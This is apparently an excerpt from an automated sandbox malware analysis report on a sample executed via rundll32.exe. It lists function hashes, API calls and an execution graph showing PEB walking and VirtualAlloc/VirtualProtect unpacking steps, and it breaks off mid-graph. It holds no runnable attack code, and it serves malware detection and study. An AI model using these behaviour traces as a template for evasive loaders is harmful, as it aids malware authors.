                                                                      • Instruction Fuzzy Hash: 50112231A813149FE764CF60DC45BA7B7ECFF05320F408A29ED96CB240DBB5A6409BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020184D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction ID: f247034f5e4ab2d0d864addda6121c4c8ba2b1696375e6337edc1af0eab8f8ba
                                                                      • Opcode Fuzzy Hash: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction Fuzzy Hash: 2B110331A417159FE760CF618C44BA7B7EEFB06320F448A2AED05C7240D7B6A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02018298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020182E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020182F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction ID: 46021d9a412e1b69fcc11bb575feb0f06823cabc93ec4585b1f52fbab1bccd3e
                                                                      • Opcode Fuzzy Hash: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction Fuzzy Hash: 0C01D631641318AFEB044F50DC88B9FBB9AFB40764F88C525F9048B201C376AE109BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02018170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020181C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020181CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction ID: d573f4eac87fd3fb5cbe5fdf2bcfe0a121122287d1c26aa6b3925ce7953e5bbb
                                                                      • Opcode Fuzzy Hash: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction Fuzzy Hash: 63016D32A403259BE7509B94D888B67F7DDE741391F84C666ED04CB602C37ADA50DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02052B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 02052B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 02052BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 02052BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 02052BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction ID: 538b4ad91935a288d588a3d2b5f6bf92c4be5d1c118b051f32b8b668f4ba3d7f
                                                                      • Opcode Fuzzy Hash: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction Fuzzy Hash: DD2136746043409FEB40DF68C8C0EAAB7F8AF48310F158195ED48CF2A6D775E840DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020180E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 02018110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction ID: 0e46f3b322d392e8872acbd612a963bb40dc656fab4e4a6aff8f4a0cea7db47a
                                                                      • Opcode Fuzzy Hash: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction Fuzzy Hash: C9F024339403014AF7804A34CDC4737758EB742334F80CF21E6258A6C1C33E8B00E644
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 260 Parent PID: 2692 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:937
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 3385 1a371e 3386 1a3745 3385->3386 3389 1a68ec 3386->3389 3390 1a69d8 3389->3390 3394 1a37dd 3389->3394 3395 1af797 3390->3395 3392 1a69ee 3398 1bba51 3392->3398 3397 1af857 3395->3397 3402 1a27ec GetPEB 3395->3402 3397->3392 3399 1bba71 3398->3399 3401 1bbb6d 3399->3401 3403 1a177c 3399->3403 3401->3394 3402->3397 3404 1a1905 3403->3404 3411 1b95b0 3404->3411 3407 1a1949 3409 1bba51 GetPEB 3407->3409 3410 1a197a 3407->3410 3409->3410 3410->3401 3412 1b95c9 3411->3412 3413 1a68ec GetPEB 3412->3413 3414 1a192f 3413->3414 3414->3407 3415 1ae5c0 3414->3415 3416 1ae5d3 3415->3416 3417 1a68ec GetPEB 3416->3417 3418 1ae671 3417->3418 3418->3407 4298 1b819f 4310 1b8601 4298->4310 4299 1b880e 4301 1ae761 GetPEB 4299->4301 4300 1bb63c GetPEB 4300->4310 4302 1b880c 4301->4302 4304 1ad3f5 GetPEB 4304->4310 4305 1ad54c GetPEB 4305->4310 4307 1a4a6f GetPEB 4307->4310 4308 1ab340 GetPEB 4308->4310 4309 1a74bf GetPEB 4309->4310 4310->4299 4310->4300 4310->4302 4310->4304 4310->4305 4310->4307 4310->4308 4310->4309 4311 1aa25a 4310->4311 4315 1b1ac5 4310->4315 4312 1aa28b 4311->4312 4313 1a68ec GetPEB 4312->4313 4314 1aa308 4313->4314 4314->4310 4316 1b1ad8 4315->4316 4317 1a68ec GetPEB 4316->4317 4318 1b1b9a 4317->4318 4318->4310 3419 1b4012 3420 1b402f 3419->3420 3427 1a4a6f 3420->3427 3424 1b418d 3452 1a7015 3427->3452 3432 1a5d63 3440 1a5d84 3432->3440 3434 1a6716 3435 1ad3f5 GetPEB 3434->3435 3437 1a670f 3435->3437 3437->3424 3446 1ad3f5 3437->3446 3439 1a4a6f GetPEB 3439->3440 3440->3434 3440->3437 3440->3439 3444 1abf62 GetPEB 3440->3444 3459 1b2032 3440->3459 3463 1a9038 3440->3463 3466 1a5c8a 3440->3466 3470 1b280b 3440->3470 3474 1b11d8 3440->3474 3478 1b883c 3440->3478 3482 1a8c61 3440->3482 3444->3440 3447 1ad408 3446->3447 3448 1a7015 GetPEB 3447->3448 3449 1ad4e4 3448->3449 3486 1a3011 3449->3486 3453 1a68ec GetPEB 3452->3453 3454 1a4b11 3453->3454 3455 1a90d2 3454->3455 3456 1a90ec 3455->3456 3457 1a68ec GetPEB 3456->3457 3458 1a4b22 3457->3458 3458->3424 3458->3432 3460 1b2052 3459->3460 3461 1a68ec GetPEB 3460->3461 3462 1b20c8 3461->3462 3462->3440 3464 1a68ec GetPEB 3463->3464 3465 1a90c5 3464->3465 3465->3440 3467 1a5cb6 3466->3467 3468 1a68ec GetPEB 3467->3468 3469 1a5d50 3468->3469 3469->3440 3471 1b2838 3470->3471 3472 1a68ec GetPEB 3471->3472 3473 1b28b5 3472->3473 3473->3440 3475 1b11eb 3474->3475 3476 1a68ec GetPEB 3475->3476 3477 1b1293 3476->3477 3477->3440 3479 1b885b 3478->3479 3480 1a68ec GetPEB 3479->3480 3481 1b88fe 3480->3481 3481->3440 3483 1a8c91 3482->3483 3484 1a68ec GetPEB 3483->3484 3485 1a8d2e 3484->3485 3485->3440 3487 1a302c 3486->3487 3488 1a68ec GetPEB 3487->3488 3489 1a30c0 3488->3489 3489->3424 3372 1bf090 3373 1bf0b5 3372->3373 3378 1be620 3373->3378 3375 1bf1bf 3381 1beb40 VirtualProtect 3375->3381 3377 1bf1f8 3379 1be661 3378->3379 3380 1be694 VirtualAlloc 3379->3380 3380->3375 3382 1beb95 3381->3382 3383 1bede6 3382->3383 3384 1bedb8 VirtualProtect 3382->3384 3383->3377 3384->3382 3494 1b2515 3498 1b2529 3494->3498 3495 1b2722 3498->3495 3503 1b6158 3498->3503 3515 1bb165 3498->3515 3525 1aa323 3498->3525 3544 1bcc7f 3498->3544 3554 1a1983 3498->3554 3567 1b34c3 3498->3567 3504 1b64a7 3503->3504 3506 1b6628 3504->3506 3509 1a4a6f GetPEB 3504->3509 3511 1b6626 3504->3511 3575 1a3c8e 3504->3575 3579 1a5370 3504->3579 3583 1a9a4b 3504->3583 3587 1b02e1 3504->3587 3591 1a598b 3504->3591 3601 1ba6d9 3504->3601 3508 1ad3f5 GetPEB 3506->3508 3508->3511 3509->3504 3511->3498 3521 1bb4a0 3515->3521 3516 1bb624 3518 1ad3f5 GetPEB 3516->3518 3517 1a4a6f GetPEB 3517->3521 3519 1bb610 3518->3519 3519->3498 3521->3516 3521->3517 3521->3519 3687 1b9e33 3521->3687 3691 1a85b2 3521->3691 3695 1a50f1 3521->3695 3703 1b0fbc 3521->3703 3728 1af6fa 3525->3728 3527 1a5370 GetPEB 3540 1aaba3 3527->3540 3528 1aaf45 3533 1ad3f5 GetPEB 3528->3533 3531 1aaf43 3531->3498 3532 1bb060 GetPEB 3532->3540 3533->3531 3534 1ad3f5 GetPEB 3534->3540 3535 1b02e1 GetPEB 3535->3540 3536 1ba6d9 GetPEB 3536->3540 3537 1a4a6f GetPEB 3537->3540 3538 1ae761 GetPEB 3538->3540 3540->3527 3540->3528 3540->3531 3540->3532 3540->3534 3540->3535 3540->3536 3540->3537 3540->3538 3541 1a598b GetPEB 3540->3541 3543 1a3c8e GetPEB 3540->3543 3731 1b08cf 3540->3731 3738 1b189f 3540->3738 3742 1a39e1 3540->3742 3746 1a4d48 3540->3746 3541->3540 3543->3540 3549 1bcf95 3544->3549 3545 1b9e33 GetPEB 3545->3549 3546 1bd120 3547 1ad3f5 GetPEB 3546->3547 3548 1bd10c 3547->3548 3548->3498 3549->3545 3549->3546 3549->3548 3550 1a4a6f GetPEB 3549->3550 3551 1a85b2 GetPEB 3549->3551 3552 1a50f1 GetPEB 3549->3552 3553 1b0fbc GetPEB 3549->3553 3550->3549 3551->3549 3552->3549 3553->3549 3555 1a205f 3554->3555 3557 1a2335 3555->3557 3560 1a4a6f GetPEB 3555->3560 3562 1a2321 3555->3562 3563 1ba6d9 GetPEB 3555->3563 3565 1a598b GetPEB 3555->3565 3566 1ae761 GetPEB 3555->3566 3760 1b891e 3555->3760 3769 1ae81f 3555->3769 3772 1b1372 3555->3772 3777 1a28aa 3555->3777 3559 1ad3f5 GetPEB 3557->3559 3559->3562 3560->3555 3562->3498 3563->3555 3565->3555 3566->3555 3568 1b35ca 3567->3568 3569 1ba6d9 GetPEB 3568->3569 3570 1a598b GetPEB 3568->3570 3571 1b36a9 3568->3571 3573 1a4a6f GetPEB 3568->3573 3574 1b36a7 3568->3574 3569->3568 3570->3568 3572 1ad3f5 GetPEB 3571->3572 3572->3574 3573->3568 3574->3498 3576 1a3cb4 3575->3576 3577 1a68ec GetPEB 3576->3577 3578 1a3d4c 3577->3578 3578->3504 3580 1a538b 3579->3580 3581 1a4a6f GetPEB 3580->3581 3582 1a53fd 3581->3582 3582->3504 3582->3582 3584 1a9a72 3583->3584 3614 1b36c4 3584->3614 3588 1b02f3 3587->3588 3589 1ad3f5 GetPEB 3588->3589 3590 1b0332 3589->3590 3590->3504 3592 1a59b9 3591->3592 3617 1a4cc9 3592->3617 3597 1a5c48 3597->3504 3600 1ae761 GetPEB 3600->3597 3612 1babdd 3601->3612 3603 1badb1 3603->3504 3604 1a5370 GetPEB 3604->3612 3605 1badb3 3608 1ae761 GetPEB 3605->3608 3608->3603 3610 1b02e1 GetPEB 3610->3612 3612->3603 3612->3604 3612->3605 3612->3610 3637 1ad54c 3612->3637 3641 1ab340 3612->3641 3645 1b1ba5 3612->3645 3653 1b5f20 3612->3653 3657 1bb060 3612->3657 3661 1bb63c 3612->3661 3615 1a68ec GetPEB 3614->3615 3616 1a9a91 3615->3616 3616->3504 3618 1a4ce1 3617->3618 3629 1aff2c 3618->3629 3621 1bade2 3622 1bae1e 3621->3622 3623 1a68ec GetPEB 3622->3623 3624 1a5c3d 3623->3624 3624->3597 3625 1ae761 3624->3625 3626 1ae777 3625->3626 3627 1a68ec GetPEB 3626->3627 3628 1a5c68 3627->3628 3628->3600 3630 1aff45 3629->3630 3633 1bd7a6 3630->3633 3634 1bd7c1 3633->3634 3635 1a68ec GetPEB 3634->3635 3636 1a4d40 3635->3636 3636->3621 3638 1ad563 3637->3638 3665 1bcbab 3638->3665 3642 1ab356 3641->3642 3643 1a68ec GetPEB 3642->3643 3644 1ab3dd 3643->3644 3644->3612 3646 1b1bbc 3645->3646 3669 1a96ca 3646->3669 3654 1b5f44 3653->3654 3655 1a68ec GetPEB 3654->3655 3656 1b5ff8 3655->3656 3656->3612 3658 1bb082 3657->3658 3659 1b36c4 GetPEB 3658->3659 3660 1bb0a4 3659->3660 3660->3612 3662 1bb66c 3661->3662 3663 1a68ec GetPEB 3662->3663 3664 1bb6ed 3663->3664 3664->3612 3666 1bcbcc 3665->3666 3667 1a68ec GetPEB 3666->3667 3668 1ad5ae 3667->3668 3668->3612 3670 1a68ec GetPEB 3669->3670 3671 1a9769 3670->3671 3672 1ad4fe 3671->3672 3673 1a96ca GetPEB 3672->3673 3674 1ad536 3673->3674 3675 1b8f9b 3674->3675 3678 1b8fd7 3675->3678 3676 1b1d04 3676->3612 3678->3676 3679 1aeadd 3678->3679 3680 1aeaf3 3679->3680 3683 1bafaf 3680->3683 3684 1bafc2 3683->3684 3685 1a68ec GetPEB 3684->3685 3686 1aeb4c 3685->3686 3686->3678 3688 1b9e49 3687->3688 3708 1a0cb5 3688->3708 3692 1a85d5 3691->3692 3693 1a68ec GetPEB 3692->3693 3694 1a8667 3693->3694 3694->3521 3696 1a510e 3695->3696 3697 1a534a 3696->3697 3712 1b1f7b 3696->3712 3697->3521 3701 1a5305 3701->3697 3702 1a58e8 GetPEB 3701->3702 3702->3701 3706 1b0fd0 3703->3706 3704 1b1102 3704->3521 3705 1ae5c0 GetPEB 3705->3706 3706->3704 3706->3705 3724 1b453a 3706->3724 3709 1a0ccf 3708->3709 3710 1a68ec GetPEB 3709->3710 3711 1a0d69 3710->3711 3711->3521 3713 1b1f9c 3712->3713 3714 1a68ec GetPEB 3713->3714 3715 1a52e6 3714->3715 3715->3697 3716 1a58e8 3715->3716 3717 1a5901 3716->3717 3720 1bd6e1 3717->3720 3721 1bd6fe 3720->3721 3722 1a68ec GetPEB 3721->3722 3723 1a5983 3722->3723 3723->3701 3725 1b4553 3724->3725 3726 1a68ec GetPEB 3725->3726 3727 1b45d6 3726->3727 3727->3706 3729 1a68ec GetPEB 3728->3729 3730 1af787 3729->3730 3730->3540 3732 1b08e9 3731->3732 3733 1b0b5a 3732->3733 3735 1a4a6f GetPEB 3732->3735 3736 1b0b58 3732->3736 3752 1a37f6 3732->3752 3734 1a37f6 GetPEB 3733->3734 3734->3736 3735->3732 3736->3540 3739 1b18b2 3738->3739 3740 1a68ec GetPEB 3739->3740 3741 1b1928 3740->3741 3741->3540 3743 1a3a17 3742->3743 3744 1a68ec GetPEB 3743->3744 3745 1a3ad0 3744->3745 3745->3540 3749 1a4d77 3746->3749 3747 1a4f7f 3747->3540 3748 1a4a6f GetPEB 3748->3749 3749->3747 3749->3748 3750 1a4f65 3749->3750 3756 1ab046 3750->3756 3753 1a381b 3752->3753 3754 1a68ec GetPEB 3753->3754 3755 1a38a6 3754->3755 3755->3732 3757 1ab060 3756->3757 3758 1a58e8 GetPEB 3757->3758 3759 1ab0fb 3758->3759 3759->3747 3761 1b895f 3760->3761 3764 1b8e18 3761->3764 3765 1a4cc9 GetPEB 3761->3765 3766 1a5370 GetPEB 3761->3766 3768 1b02e1 GetPEB 3761->3768 3785 1afada 3761->3785 3789 1bb0ac 3761->3789 3793 1b45e3 3761->3793 3764->3555 3765->3761 3766->3761 3768->3761 3770 1a68ec GetPEB 3769->3770 3771 1ae8d4 3770->3771 3771->3555 3797 1b0f0d 3772->3797 3782 1a28cb 3777->3782 3778 1ae81f GetPEB 3778->3782 3779 1a2b4a 3781 1ae761 GetPEB 3779->3781 3783 1a2b48 3781->3783 3782->3778 3782->3779 3782->3783 3804 1a2dc4 3782->3804 3808 1b1dec 3782->3808 3783->3555 3786 1afb1b 3785->3786 3787 1a68ec GetPEB 3786->3787 3788 1afbc5 3787->3788 3788->3761 3790 1bb0ca 3789->3790 3791 1a68ec GetPEB 3790->3791 3792 1bb155 3791->3792 3792->3761 3794 1b45f3 3793->3794 3795 1a68ec GetPEB 3794->3795 3796 1b4693 3795->3796 3796->3761 3798 1a68ec GetPEB 3797->3798 3799 1b0fb3 3798->3799 3800 1b600e 3799->3800 3801 1b6027 3800->3801 3802 1a68ec GetPEB 3801->3802 3803 1b1444 3802->3803 3803->3555 3805 1a2df4 3804->3805 3806 1a68ec GetPEB 3805->3806 3807 1a2e94 3806->3807 3807->3782 3809 1b1e09 3808->3809 3810 1a68ec GetPEB 3809->3810 3811 1b1ea4 3810->3811 3811->3782 4327 1a9d95 4331 1aa07d 4327->4331 4328 1ad54c GetPEB 4328->4331 4329 1a4a6f GetPEB 4329->4331 4331->4328 4331->4329 4332 1b2982 GetPEB 4331->4332 4333 1aa24d 4331->4333 4334 1a502c GetPEB 4331->4334 4335 1a3c8e GetPEB 4331->4335 4336 1b14fc 4331->4336 4332->4331 4334->4331 4335->4331 4341 1b163c 4336->4341 4337 1af965 GetPEB 4337->4341 4338 1ad54c GetPEB 4338->4341 4339 1b189f GetPEB 4339->4341 4340 1b170e 4340->4331 4341->4337 4341->4338 4341->4339 4341->4340 4342 1a498c 4343 1a49aa 4342->4343 4344 1a4a6f GetPEB 4343->4344 4345 1a4a3c 4344->4345 4346 1ad3f5 GetPEB 4345->4346 4347 1a4a64 4345->4347 4346->4347 4348 1adb86 4353 1ade20 4348->4353 4349 1ad4fe GetPEB 4349->4353 4350 1a96ca GetPEB 4350->4353 4351 1b8f9b GetPEB 4351->4353 4352 1adf2e 4353->4349 4353->4350 4353->4351 4353->4352 3812 1bb706 3813 1bb80b 3812->3813 3819 1bb85e 3813->3819 3820 1b41ab 3813->3820 3818 1b02e1 GetPEB 3818->3819 3826 1b41c4 3820->3826 3822 1b4411 3840 1bc4a5 3822->3840 3824 1b440f 3832 1b9eda 3824->3832 3826->3822 3826->3824 3836 1b17e1 3826->3836 3831 1b02e1 GetPEB 3831->3824 3833 1b9efa 3832->3833 3834 1a4a6f GetPEB 3833->3834 3835 1b9f94 3834->3835 3835->3818 3837 1b17fa 3836->3837 3838 1a68ec GetPEB 3837->3838 3839 1b1891 3838->3839 3839->3826 3841 1bc4bb 3840->3841 3842 1a4a6f GetPEB 3841->3842 3843 1b4427 3842->3843 3844 1a9c3d 3843->3844 3853 1abea5 3844->3853 3846 1a9d8a 3849 1b8e80 3846->3849 3850 1b8e9f 3849->3850 3851 1b36c4 GetPEB 3850->3851 3852 1b4452 3851->3852 3852->3831 3854 1abec4 3853->3854 3855 1a68ec GetPEB 3854->3855 3856 1a9d3a 3855->3856 3856->3846 3857 1bd623 3856->3857 3858 1bd64a 3857->3858 3859 1a68ec GetPEB 3858->3859 3860 1bd6cb 3859->3860 3860->3846 3861 1a4304 3865 1a476b 3861->3865 3863 1a4964 3864 1a5370 GetPEB 3864->3865 3865->3863 3865->3864 3866 1a9a4b GetPEB 3865->3866 3867 1a4966 3865->3867 3868 1bb63c GetPEB 3865->3868 3870 1b02e1 GetPEB 3865->3870 3872 1b373e 3865->3872 3876 1b3805 3865->3876 3866->3865 3869 1ae761 GetPEB 3867->3869 3868->3865 3869->3863 3870->3865 3873 1b375e 3872->3873 3874 1a68ec GetPEB 3873->3874 3875 1b37f3 3874->3875 3875->3865 3877 1b3818 3876->3877 3878 1a68ec GetPEB 3877->3878 3879 1b38b6 3878->3879 3879->3865 4354 1a3db8 4355 1b0f0d GetPEB 4354->4355 4360 1a4196 4355->4360 4356 1a42d3 4358 1bc15b GetPEB 4356->4358 4357 1a42d1 4358->4357 4359 1a5370 GetPEB 4359->4360 4360->4356 4360->4357 4360->4359 4361 1a96ca GetPEB 4360->4361 4362 1a9a4b GetPEB 4360->4362 4363 1bb060 GetPEB 4360->4363 4364 1b02e1 GetPEB 4360->4364 4361->4360 4362->4360 4363->4360 4364->4360 4365 1ad5b8 4368 1ad85a 4365->4368 4366 1ad9e5 4370 1b11d8 GetPEB 4366->4370 4368->4366 4369 1ad3f5 GetPEB 4368->4369 4372 1ad9e3 4368->4372 4373 1b0339 GetPEB 4368->4373 4375 1b0604 4368->4375 4382 1b1719 4368->4382 4386 1a6a1b 4368->4386 4369->4368 4370->4372 4373->4368 4377 1b061d 4375->4377 4376 1a91b4 GetPEB 4376->4377 4377->4376 4378 1a4a6f GetPEB 4377->4378 4379 1b0829 4377->4379 4380 1b084e 4377->4380 4378->4377 4390 1a91b4 4379->4390 4380->4368 4383 1b1735 4382->4383 4384 1a68ec GetPEB 4383->4384 4385 1b17cf 4384->4385 4385->4368 4387 1a6a34 4386->4387 4388 1a68ec GetPEB 4387->4388 4389 1a6ad6 4388->4389 4389->4368 4391 1a91e2 4390->4391 4392 1a68ec GetPEB 4391->4392 4393 1a928a 4392->4393 4393->4380 4394 1ab6b9 4399 1ab85f 4394->4399 4395 1ab8cd 4396 1ad3f5 GetPEB 4396->4399 4397 1bbba5 GetPEB 4397->4399 4398 1b9e33 GetPEB 4398->4399 4399->4395 4399->4396 4399->4397 4399->4398 4400 1ae761 GetPEB 4399->4400 4400->4399 4401 1a38be 4402 1bbba5 GetPEB 4401->4402 4403 1a394c 4402->4403 4404 1b34bf 4405 1b35ca 4404->4405 4406 1ba6d9 GetPEB 4405->4406 4407 1a598b GetPEB 4405->4407 4408 1b36a9 4405->4408 4410 1a4a6f GetPEB 4405->4410 4411 1b36a7 4405->4411 4406->4405 4407->4405 4409 1ad3f5 GetPEB 4408->4409 4409->4411 4410->4405 4412 1b90be 4413 1b0f0d GetPEB 4412->4413 4414 1b9275 4413->4414 4415 1a4a6f GetPEB 4414->4415 4418 1b9319 4414->4418 4416 1b92f8 4415->4416 4417 1af965 GetPEB 4416->4417 4416->4418 4417->4418 3880 1b9333 3885 1b949b 3880->3885 3881 1ab340 GetPEB 3881->3885 3883 1b9569 3885->3881 3885->3883 3886 1b0241 3885->3886 3889 1a9a99 3885->3889 3897 1a2353 3886->3897 3890 1a9ab9 3889->3890 3916 1b28cc 3890->3916 3895 1ae761 GetPEB 3896 1a9c32 3895->3896 3896->3885 3904 1a2374 3897->3904 3900 1a2684 3901 1ae761 GetPEB 3900->3901 3902 1a2682 3901->3902 3902->3885 3904->3900 3904->3902 3905 1b1eb2 3904->3905 3909 1b20dc 3904->3909 3912 1b0b97 3904->3912 3906 1b1ecb 3905->3906 3907 1a68ec GetPEB 3906->3907 3908 1b1f6c 3907->3908 3908->3904 3910 1a68ec GetPEB 3909->3910 3911 1b216b 3910->3911 3911->3904 3913 1b0bb0 3912->3913 3914 1a68ec GetPEB 3913->3914 3915 1b0c47 3914->3915 3915->3904 3917 1a68ec GetPEB 3916->3917 3918 1a9bfe 3917->3918 3918->3896 3919 1b1111 3918->3919 3920 1b112c 3919->3920 3921 1a68ec GetPEB 3920->3921 3922 1a9c1e 3921->3922 3922->3895 3923 1b7132 3924 1b7195 3923->3924 3926 1a7405 GetPEB 3924->3926 3929 1b7f7f 3924->3929 3931 1b7f99 3924->3931 3932 1a4a6f GetPEB 3924->3932 3934 1a5370 GetPEB 3924->3934 3938 1b02e1 GetPEB 3924->3938 3940 1ad3f5 GetPEB 3924->3940 3942 1b1933 3924->3942 3946 1a95e8 3924->3946 3950 1bb869 3924->3950 3953 1b7065 3924->3953 3957 1a92a3 3924->3957 3966 1a6737 3924->3966 3970 1ae272 3924->3970 3977 1b3c35 3924->3977 3981 1aedc7 3924->3981 3926->3924 3985 1a7405 3929->3985 3932->3924 3934->3924 3938->3924 3940->3924 3943 1b195c 3942->3943 3944 1a68ec GetPEB 3943->3944 3945 1b19ed 3944->3945 3945->3924 3947 1a9607 3946->3947 3948 1a68ec GetPEB 3947->3948 3949 1a96a5 3948->3949 3949->3924 3989 1a3aeb 3950->3989 3954 1b7093 3953->3954 3955 1a68ec GetPEB 3954->3955 3956 1b7119 3955->3956 3956->3924 3963 1a94b4 3957->3963 3959 1a95b5 3960 1a95cc 3959->3960 3961 1ad3f5 GetPEB 3959->3961 3960->3924 3961->3960 3962 1a4a6f GetPEB 3962->3963 3963->3959 3963->3962 3964 1a58e8 GetPEB 3963->3964 3965 1ad3f5 GetPEB 3963->3965 3993 1b2a4e 3963->3993 3964->3963 3965->3963 3967 1a6754 3966->3967 3968 1a68ec GetPEB 3967->3968 3969 1a6807 3968->3969 3969->3924 3972 1ae28f 3970->3972 3971 1ae4bd 3974 1ae67c GetPEB 3971->3974 3972->3971 3973 1ae4bb 3972->3973 3975 1a4a6f GetPEB 3972->3975 3997 1ae67c 3972->3997 3973->3924 3974->3973 3975->3972 3978 1b3c5f 3977->3978 3979 1a68ec GetPEB 3978->3979 3980 1b3d14 3979->3980 3980->3924 3982 1aede9 3981->3982 3983 1a68ec GetPEB 3982->3983 3984 1aee75 3983->3984 3984->3924 3986 1a7418 3985->3986 3987 1a68ec GetPEB 3986->3987 3988 1a74b4 3987->3988 3988->3931 3990 1a3b14 3989->3990 3991 1a68ec GetPEB 3990->3991 3992 1a3ba6 3991->3992 3992->3924 3994 1b2a6d 3993->3994 3995 1a68ec GetPEB 3994->3995 3996 1b2ae7 3995->3996 3996->3963 3998 1ae6a8 3997->3998 3999 1a68ec GetPEB 3998->3999 4000 1ae747 3999->4000 4000->3972 4001 1b0437 4003 1b044e 4001->4003 4002 1b0536 4003->4002 4004 1a4a6f GetPEB 4003->4004 4004->4003 4009 1aef2e 4016 1aef53 4009->4016 4012 1a4a6f GetPEB 4012->4016 4013 1af439 4014 1af44c 4013->4014 4017 1ad3f5 GetPEB 4013->4017 4016->4012 4016->4013 4016->4014 4019 1a58e8 GetPEB 4016->4019 4020 1a4b2a 4016->4020 4024 1b0558 4016->4024 4027 1a3bbc 4016->4027 4031 1a6818 4016->4031 4017->4014 4019->4016 4021 1a4b53 4020->4021 4022 1a68ec GetPEB 4021->4022 4023 1a4bf3 4022->4023 4023->4016 4025 1a68ec GetPEB 4024->4025 4026 1b05f8 4025->4026 4026->4016 4028 1a3be2 4027->4028 4029 1a68ec GetPEB 4028->4029 4030 1a3c76 4029->4030 4030->4016 4032 1a6838 4031->4032 4033 1a68ec GetPEB 4032->4033 4034 1a68da 4033->4034 4034->4016 4035 1af52e 4036 1ab340 GetPEB 4035->4036 4037 1af69d 4036->4037 4044 1a74bf 4037->4044 4040 1af6ed 4045 1a74d8 4044->4045 4046 1a68ec GetPEB 4045->4046 4047 1a7564 4046->4047 4047->4040 4048 1a2b70 4047->4048 4049 1a2b90 4048->4049 4050 1a5370 GetPEB 4049->4050 4051 1a2cde 4050->4051 4052 1a9a4b GetPEB 4051->4052 4053 